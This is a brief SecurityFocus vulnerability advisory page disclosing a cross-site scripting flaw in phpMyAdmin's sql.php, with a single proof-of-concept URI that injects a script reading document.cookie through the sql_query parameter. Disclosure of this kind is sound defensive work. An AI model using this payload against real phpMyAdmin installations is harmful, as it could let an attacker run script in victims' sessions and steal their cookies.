Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

PHPMyAdmin SQL.PHP Cross-Site Scripting Vulnerability


This issue can be exploited via a web client.

The following proof-of-concept URI is available:

http://www.example.com//phpmyadmin/sql.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=fu&table=fu&goto=tbl_properties_structure.php&back=tbl_properties_structure.php&sql
_query=SELECT+*+FROM+%60'%3Cscript%3Ealert(document.cookie)%3C/script%3E'%60







 

Privacy Statement
Copyright 2008, SecurityFocus